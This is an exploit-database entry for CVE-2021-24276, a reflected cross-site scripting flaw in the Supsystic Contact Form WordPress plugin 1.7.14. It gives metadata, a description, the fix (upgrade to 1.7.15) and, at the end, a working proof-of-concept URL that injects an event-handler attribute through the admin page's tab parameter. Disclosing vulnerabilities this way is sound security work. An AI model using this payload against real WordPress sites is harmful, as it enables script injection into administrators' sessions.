header-logo
Suggest Exploit
vendor:
Contact Form by Supsystic
by:
0xB9
6,1
CVSS
MEDIUM
Reflected Cross-Site Scripting (XSS)
79
CWE
Product Name: Contact Form by Supsystic
Affected Version From: 1.7.14
Affected Version To: 1.7.15
Patch Exists: Yes
Related CWE: CVE-2021-24276
CPE: 2.3:a:wordpress:contact_form_by_supsystic
Metasploit: N/A
Tags: wordpress,cve,cve2021,wp-plugin,wpscan,packetstorm
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Nuclei Metadata: {'max-request': 1, 'framework': 'wordpress', 'vendor': 'supsystic', 'product': 'contact_form'}
Platforms Tested: Windows 10
2021

WordPress Plugin Contact Form 1.7.14 – Reflected Cross-Site Scripting (XSS)

WordPress Supsystic Contact Form plugin before 1.7.15 contains a cross-site scripting vulnerability. It does not sanitize the tab parameter of its options page before outputting it in an attribute.

Mitigation:

Upgrade to version 1.7.15 or later.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/
# Version: 1.7.14
# Tested on: Windows 10
# CVE: CVE-2021-24276

1. Description:
The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue

2. Proof of Concept:
/wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//